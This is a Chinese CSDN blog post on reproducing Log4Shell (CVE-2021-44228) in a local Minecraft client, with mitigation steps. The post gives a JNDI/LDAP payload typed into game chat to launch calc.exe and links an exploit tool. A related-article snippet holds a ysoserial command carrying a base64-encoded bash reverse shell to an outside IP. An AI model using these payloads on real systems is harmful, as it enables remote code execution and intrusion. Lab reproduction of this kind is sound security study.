【记一次】Log4j 漏洞在《我的世界》上复现

已于 2024-06-10 16:08:13 修改
阅读量800 收藏 8
点赞数 2
文章标签: log4j
于 2024-06-10 10:45:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_71467825/article/details/139574215
版权

漏洞描述

Log4j 2是一个基于Java的日志记录工具,是对 Log4j 的升级。

紧急处置方案

  1. 修改配置 log4j2.formatMsgNoLookups=True
  2. 修改jvm参数 -Dlog4j2.formatMsgNoLookups=true
  3. 通过防火墙自定义规则,限制jndildap 等恶意payload
  4. 漏洞探测大多采用dnslog 等带外方式,可以禁掉服务器主动外联权限

漏洞复现

首先我们需要一个jndi服务用于漏洞注入,可以在GitHub下载一个jar包(https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0)

其次,当然我们需要一个《我的世界》的客户端(目前仅测试1.12.2版本)

然后我们测试弹出 计算器程序 calc.exe,起jndi服务并添加相应参数

构造出payload:${jndi:ldap://127.0.0.1:1389/abzi13},然后启动游戏,随便创建个世界进入,按T打开聊天窗口输入payload,即可弹出计算器程序

溯源系列:溯源案例二(2022实战 | 一次Everything服务引发的蓝队溯源以及Everything后渗透的利用简介)
weixin_54626591的博客
01-07 1027
溯源案例二(2022实战 | 一次Everything服务引发的蓝队溯源以及Everything后渗透的利用简介)
【网络安全 | 漏洞挖掘】介绍一个价值50000美元的漏洞
最新发布
等风来
02-24 1453
Zendesk会处理该域名的所有邮件,这意味着,如果公司的SSO系统未正确验证邮件地址,任何人都可能利用这一漏洞,通过访问Zendesk来绕过验证,进而访问公司的内部系统。攻击的路径变得非常简单:我只需要创建一个使用support@company.com邮箱的Google账户,申请验证代码,利用漏洞访问Zendesk自动生成的票据,验证Google账户,然后通过Google登录Slack。Zendesk会误以为这是合法的邮件,并将攻击者的邮箱加入到工单中,使他们能够访问该工单的全部历史录。
无情的 Log4j 攻击包括状态参与者、可能的蠕虫
ZY_Eliza的博客
12-22 318
已经针对一半的企业网络发起了超过 180 万次攻击以利用 Log4Shell。 称其为威胁的“僵局”:包括民族国家行为者在内的攻击者已经使用至少 70 个不同的恶意软件系列将安全公司遥测中的所有企业全球网络的一半作为目标——而 Log4j 漏洞的影响才刚刚开始。 过去几天,世界各地的键盘研究人员一直在追踪针对现在臭名昭著的 Log4jJava 库错误的攻击,该错误被称为Log4Shell (CVE-2021-44228)。旁注:Log4j 发音为“log forge”——尽管这是有争议的,因为它在...
Log4j2惊现大漏洞? 开源维护者越来越难?
开源精选
12-15 692
Log4j2惊现大漏洞? 开源维护者越来越难? 作者:Filippo Valsorda 编译:郭露 原文链接:https://blog.filippo.io/professional-maintainers/ 已获得作者授权,请勿转载 不久前,Log4j2的数据库中出现了严重的RCE漏洞,包括苹果公司、Steam以及Spotify均受到波及。此次事件表明,专业开源维护者的缺乏使得互联网面临着巨大的危机。尽管如今人们已开始着手修复Log4j2的漏洞,但修复项目在GitHub上仅得到了三个人的赞助。
JAVA漏洞log4j | 我的世界遭黑客袭击
Xunlan_博客
12-13 7402
我的世界java版服务端、客户端存在安全隐患。 漏洞利用log4j2在打印日志时会自动将形如${...}的文本替换为功能文本发送恶意链接。
探秘安全漏洞log4jminecraft
gitblog_00010的博客
06-09 357
探秘安全漏洞log4jminecraft 去发现同类优质开源项目:https://gitcode.com/ 项目介绍 log4jminecraft 是一个独特的开源项目,旨在教育和提高人们对网络安全的认识,尤其是针对Apache Log4j的严重漏洞(CVE-2021-44228)。该项目通过模拟Minecraft服务器环境,展示了如何利用Log4j漏洞进行攻击。请注意,这个项目的目的不是鼓励非...
Log4j2漏洞(二)3种方式复现反弹shell
02-08 2448
Log4j2漏洞(二)3种方式复现反弹shell,有对环境要求苛刻的、有步骤多的、也有简单易现的,复现时按需要选择,如果是学习我建议都学习下。
log4j详解
mczhu2的专栏
07-29 289
简介     简单的说log4j就是帮助开发人员进行日志输出管理的API类库。它最重要的特点就可以配置文件灵活的设置 日志信息的优先级、日志信息的输出目的地以及日志信息的输出格式。     Log4j除了可以录程序运行日志信息外还有一重要的功能就是用来 显示调试信息。程序员经常会遇到脱离java ide环境调试程序的情况,这时大多数人会选择使用System.out.pri
Log4j2高危漏洞修复
猎隼
12-11 2130
Apache Log4j 远程代码执行漏洞细节被公开,攻击者利用漏洞可以远程执行代码。 具体复现细节可以到GitHub上搜索 log4j/exp 或者log4j/poc 即可找到相关程序。 (1)影响范围 Apache Log4j <= 2.14.x (除1.x) (2)查找jar linux sudo find / -name "*log4j-*.jar" Windows 计算机 搜索 *log4j*.jar java项目依赖包搜索log4j,这里使用idea举例,展开
Log4J2 靶场漏洞复现
weixin_47019868的博客
12-18 1万+
北京时间12月9号深夜,Apache Log4j2被曝出一个高危漏洞,攻击者通过jndi注入攻击的形式可以轻松远程执行任何代码。随后官方紧急推出了2.15.0和2.15.0-rc1新版本修复,依然未能完全解决问题,现在已经更新到2.15.0-rc2(近日已推出2.16版本)。该漏洞被命名为Log4Shell,编号CVE-2021-44228。相关地址NVD - CVE-2021-44228 本次漏洞复现采用vulfocus的log4j2靶场docker 使用Kali系统进行复现实验 在Kali系统
【Java小姿势】Log4j2漏洞的前世今生
行雨斋
12-20 3020
A.源起 2021年12月9日,各大公司都被一个重量级漏洞引爆了,该漏洞一旦被攻击者利用就会造成及其严重的影响。经过快速分析和确认,该漏洞影响范围极其广泛,危害极其严重。然后从10日凌晨开始很多公司的程序员都被迫开始应急相应,加班加点修复问题。该漏洞涉及包含但不限于Struts2、Flink、ElasticSearch、Druid、dubbo、Redis、kafka等常用应用和组件。 爆出这个漏洞的这就是大名鼎鼎的日志组件log4j2 。作为日志组件,在java领域基本上是再常见运用不过的了,而这个漏洞可以
RMI、JNDI、LDAP介绍+log4j漏洞分析
HBohan的博客
02-28 2407
本篇主要介绍java的RMI、JNDI、LDAP,在后面会详细分析log4j的jndi注入原理。
已修改过的log4j-1.2.17.jar
11-21
使用log4j的DailyRollingFileAppender时只有一个日志文件,修改DailyRollingFileAppender源码
Log4j2】VNCTF2022 misc-minecraft log4j反弹shell复现
qq_33834637的博客
04-25 4330
##POC hint mc的flag在/flag Misc mc :hint log4j jdk8u261 commons-collections-3.2.1.jar 使用ysoserial.jar生成反序列化数据 java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8yMDkuMTQxLjMyLjc3LzIzMjIzIDA+JjE=}|{base6
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)_log4j漏洞复现
heike_Ch的博客
08-14 2881
log4j2是2021年底爆出的非常严重的漏洞,可谓是风靡一时,“血洗互联网”,也是安全公司面试的常见题目,我们应该了解这个漏洞的原理及利用方式。如何排查是否受到了攻击?检查日志中是否存在"jndi:ldap://"、"jndi:rmi//"等字符来发现可能的攻击行为,前面复现的过程在payload的构造中都出现了这样的字符串,这是攻击的典型标志。如何对log4j2的攻击进行防御?1.设置log4j2.formatMsgNoLookups=True。
idea中使用log4j2打印日志
ygd1994的专栏
05-24 1万+
先去下载log4j的jar包,将log4j-api-2.8.2.jar和log4j-core-2.8.2.jar导入到lib目录自定义log4j2.xml文件到src目录下 配置文件如下: <?xml version="1.0" encoding="UTF-8"?> <!-- status : 这个用于设置log4j2自身内部的信息输出,可以不设置,当设置成trace时,会看到log4j2内
漏洞复现】2.Apache Log4j2远程代码执行漏洞(CVE-2021-44228)复现及分析
Zichel77的博客
03-21 2178
Apache 是当今世界上非常流行的跨平台Web服务端,有着良好的扩充性。而Log4j则是Apache的开源组件,用于日志管理,功能强大。Log4j来源于 Apache 软件基金会的日志服务项目,是一种Java日志框架,从最初Log4j1发展到现在的Log4j2,已经广泛应用于各行各业的业务开发。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞
log4j.properties
一切都会好起来的,即使不在今天
08-27 448
### 设置### log4j.rootLogger=DEBUG,stdout,E log4j.logger.io.netty=WARN log4j.logger.com.mchange=WARN ### 输出信息到控制抬 ### log4j.appender.stdout=org.apache.log4j.ConsoleAppender log4j.appender.stdout.Target=...
Web网络安全-----Log4j高危漏洞原理及修复
热门推荐
qq_51690690的博客
07-27 1万+
Log4j 即 log for java(java的日志) ,是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。提示:以下是本篇文章正文内容,下面案例可供参考。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值